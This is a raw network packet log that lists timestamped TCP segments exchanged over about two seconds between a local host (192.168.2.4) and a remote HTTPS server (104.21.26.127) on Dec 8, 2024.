                                                                                                                                Dec 8, 2024 01:46:54.799114943 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.804939985 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.804954052 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.805018902 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.805023909 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.805064917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.965106964 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.965121984 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.965188980 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.965194941 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.965226889 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.965249062 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.967967987 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.967981100 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.968039989 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.968044996 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.968084097 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.970733881 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.970746040 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.970812082 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.970817089 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.970880032 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.972980022 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.972995043 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.973061085 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.973066092 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.973112106 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.977421999 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.977452040 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.977495909 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.977498055 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.977536917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.983339071 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.983351946 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.983402014 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.983407021 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.983455896 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.989397049 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.989413023 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.989448071 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.989454031 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.989489079 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.995532036 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.995549917 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:54.995604992 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:54.995610952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.042093039 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.145869017 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.145884037 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.145956039 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.145962954 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.146003008 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.152108908 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.152122974 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.152178049 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.152184010 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.152224064 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.157542944 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.157557964 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.157614946 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.157620907 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.157660961 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.163597107 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.163615942 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.163667917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.163674116 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.163713932 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.169853926 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.169867992 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.169926882 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.169931889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.169972897 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.175618887 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.175632000 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.175685883 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.175689936 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.175728083 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.181860924 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.181874990 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.181936979 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.181941986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.181978941 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.187246084 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.187259912 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.187334061 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.187338114 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.187382936 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.338030100 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.338049889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.338247061 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.338253975 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.338304043 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.343494892 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.343508959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.343583107 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.343586922 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.343627930 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.349642992 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.349656105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.349841118 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.349844933 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.349889994 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.355782986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.355797052 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.355863094 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.355868101 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.355918884 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.362035036 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.362049103 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.362112999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.362118006 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.362159014 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.367767096 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.367779970 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.367846966 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.367850065 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.367891073 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.373280048 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.373292923 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.373353958 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.373358965 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.373398066 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.379414082 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.379426956 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.379484892 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.379489899 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.379528999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.530153990 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.530169010 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.530240059 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.530251980 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.530296087 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.535752058 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.535765886 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.535836935 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.535841942 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.535888910 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.541810036 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.541822910 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.541877031 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.541882992 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.541917086 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.547935009 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.547949076 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.547996998 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.548002005 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.548018932 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.548039913 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.554135084 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.554147959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.554200888 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.554207087 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.554249048 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.559681892 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.559695959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.559741974 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.559746981 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.559783936 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.565355062 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.565367937 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.565411091 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.565417051 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.565440893 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.565465927 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.571561098 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.571573973 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.571633101 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.571641922 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.571681976 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.722570896 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.722592115 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.722754955 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.722764015 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.722826958 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.728020906 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.728039980 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.728121996 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.728127003 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.728176117 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.734219074 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.734232903 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.734296083 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.734301090 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.734348059 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.760977983 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.760991096 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.761154890 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.761159897 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.761322021 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.762687922 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.762701035 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.762754917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.762759924 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.762795925 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.764463902 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.764476061 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.764528990 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.764533997 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.764569998 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.766177893 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.766211033 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.766269922 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.766274929 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.766313076 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.770304918 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.770318985 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.770359039 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.770363092 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.770382881 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.770409107 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.916868925 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.916889906 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.916974068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.916981936 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.917032003 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.922274113 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.922291040 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.922353983 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.922358990 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.922401905 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.928972006 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.928987026 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.929044008 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.929049015 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.929090977 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.934601068 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.934634924 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.934695959 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.934701920 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.934746027 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.940850019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.940864086 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.940917015 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.940922022 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.940964937 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.946249962 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.946263075 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.946331978 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.946336985 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.946377993 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.952037096 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.952049971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.952110052 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.952114105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.952157021 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.958242893 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.958261967 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.958312988 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:55.958321095 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:55.958365917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.122235060 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.122252941 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.122304916 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.122311115 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.122353077 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.127681971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.127696037 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.127742052 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.127747059 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.127809048 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.133747101 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.133760929 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.133815050 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.133821011 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.133852959 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.139965057 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.139978886 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.140022993 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.140027046 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.140068054 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.145428896 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.145442009 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.145487070 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.145492077 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.145518064 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.145538092 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.151972055 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.151987076 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.152045965 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.152050018 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.152091026 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.157524109 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.157540083 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.157584906 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.157591105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.157612085 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.157634020 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.163512945 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.163525105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.163582087 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.163587093 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.163629055 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.528954983 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.528970957 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.529095888 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.529103994 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.529159069 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.530786991 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.530802011 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.530872107 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.530878067 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.530922890 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.533509016 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.533521891 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.533586025 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.533591032 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.533639908 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.535346031 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.535357952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.535417080 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:56.535422087 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:56.535464048 CET49979443192.168.2.4104.21.26.127
